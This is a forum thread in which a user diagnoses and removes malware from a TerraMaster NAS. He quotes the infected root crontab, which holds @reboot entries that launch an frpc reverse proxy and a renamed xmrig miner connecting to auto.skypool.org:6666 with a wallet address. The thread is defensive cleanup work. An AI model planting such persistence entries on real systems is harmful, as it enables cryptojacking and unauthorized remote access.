Page 1 of 1

Potential Malware Infection

Posted: 28 Dec 2021, 07:46
by DaveRouleau
I believe my Terra Master NAS has been hacked. After setting up rules on my new firewall to exclude traffic to/from China, Russia, and North Korea, I noticed almost 12,000 blocked packets per day coming from my NAS to auto.skypool.com:6666 (China). This appears to be a cryptomining site and possibly associated with the DarkConnections trojan.

I also noted several sites being contacted by the NAS that specifically request current external IP address, like icanhazip.com, myexternalip.com, api.ipify.org and several others. This would be typical behaviour for a bot attempting to report back to a botnet.

I am blocking all these site on my firewall as I see them, but that doesn't resolve the issue that I may have a compromised NAS. Apart from running Clam AV (scanning now, but I'm not going to hold my breath), I would appreciate some guidance on eliminating unrecognized programs from the system startup. I am a sysadmin with network security experience so you shouldn't have to dumb it down for me much. ;) My Linux is a little rusty but I'm still familiar with it as well, though I do not know how to drop into the CLI on my NAS.

-Dave

Re: Potential Malware Infection

Posted: 28 Dec 2021, 16:35
by TMSupport
Hi! If your machine has infected with virus, you can follow the article below to remove the virus.
viewtopic.php?f=71&t=2292&p=12383&hilit=pty10#p12383

Re: Potential Malware Infection

Posted: 06 Jan 2022, 06:47
by DaveRouleau
Thank you for that info. My problem wasn't a virus, but your instructions got me to where I needed to be to sort out the issue. For anyone else who might be facing the same problem, here is what it was.

My /etc/crontab/root file looked like this:

Code: Select all

*/1 * * * * /etc/init.d/nas/everyminuteexec
10 * * * * /etc/init.d/nas/everyhourexec
20 0 * * * /etc/init.d/nas/everydayexec
@reboot nohup /usr/sbin/frpc -c /etc/frpc.ini
@reboot nohup /sbin/role -o auto.skypool.org:6666 -u 45m5QmLkWtPLrcG9GxgihYjom6scJnD38T9PQFin8x4hgASVDVLp58J6g5kpxf
00 08 * * 4 /etc/tos/scripts/clamavscan start
0 12 * * * ntpdate time-a.nist.gov
The culprits are easy to see here. The first one, calling /user/sbin/frpc, is a legit fast reverse proxy agent to allow access to the NAS from the Internet (something I don't make use of). The configuration file it called listed an account with the charming basement-dweller moniker of "lonewolfkillseveryone" or some such. Sad, really.

The second uninvited process, /sbin/role, is actually the renamed xmrig cryptomining program launched with the directions to log on to the server at auto.skypool.org:6666 (which it attempted to contact almost 18,000 times per day, once every 5 seconds). I deleted the offending entries from the /etc/crontab/root file and saved it, then deleted the /etc/frpc.ini and /sbin/role files as well.

Question: Does TerraMaster use frpc for any of its legitimate functions? Asking before I delete the program entirely...

After rebooting, most of the unwanted traffic stopped, but it was still trying to hit sites to allow it to discover my Internet-facing IP (all blocked and tracked on my firewall by this point). Grep found a list of all of them in a single file called /etc/tos/get_public_ip.conf. Here's what was in it:

Code: Select all

https://ipapi.co/json/
https://ip.seeip.org
https://api.ipify.org
http://ifconfig.me/ip
https://ifconfig.co/ip
http://whatismyip.akamai.com/
http://icanhazip.com/
http://members.3322.org/dyndns/getip
https://myexternalip.com/raw

All the URLs I had been blocking! I'm not certain what program was calling this file but it's empty now and another reboot took care of the rest of the unwanted net traffic. I'm continuing to monitor, but I'm pretty happy now that the issue is resolved.

Thanks for your help! I'm open to suggestions if you feel there is anything else I should do for this.

-Dave